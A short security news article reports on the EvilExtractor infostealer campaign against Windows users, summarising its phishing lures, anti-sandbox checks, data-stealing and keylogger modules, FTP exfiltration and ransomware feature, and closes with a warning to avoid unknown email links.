A phishing campaign that uses a malicious tool called EvilExtractor introduces itself as an educational tool. This cybercriminal operation has been operating since March and actively targets MS Windows users in the United States and European countries.
Kodex developed the tool and released it in October last year. Since then, the device has received numerous upgrades to enhance its attack capabilities.
The EvilExtractor developers created the tool exclusively for targeting Windows devices and stealing their data.
According to investigations, the EvilExtractor authors developed the malicious tool to target Windows-based machines and steal data and archives from endpoint devices. Moreover, the tool includes various modules that function using an FTP service.
In addition, the tool impersonates a genuine file, such as Adobe PDF or Dropbox, to propagate via phishing attacks. Subsequently, it employs a PowerShell for executing cybercriminal activities upon loading.
This action includes checking for the environment, including anti-virtual machines and VirusTotal’s malware scanning capabilities to avoid detection. The tool also consists of a ransomware function called Kodex ransomware to encrypt infected systems.
The main code of EvilExtractor is a PowerShell command that contains various modules, such as anti-sandbox/VM/scanner, stealing data, clearing logs, FTP server setting, date time checking, and uploading stolen information.
The malware initially reviews if a targeted system’s data is between November 9, 2022, and April 12, 2023. Next, it compares the product model with a predefined list of about 187 products, including Hyper-V, VirusTotal, VMWare or other virtual devices or sandboxes.
Subsequently, the malicious tool downloads three components, MnMs[.]zip (a webcam extractor), KK2023[.]zip (used for stealing browser data) and Confirm[.]zip (a keylogger).
The malware exfiltrates files with specific extensions from the Download folder and Desktop. The confirmed extensions the campaign could extract are jpeg, png, jpg, and mp3. Lastly, the malicious tool could use the CopyFromScreen command to take a screenshot.
The EvilExtractor tool seems to be a sophisticated information stealer malware that contains several malicious features that could undergo enhancements and improved persistence soon. Therefore, Windows users should be vigilant of this newly discovered infostealer and refrain from accessing links within emails that came from unknown sources.
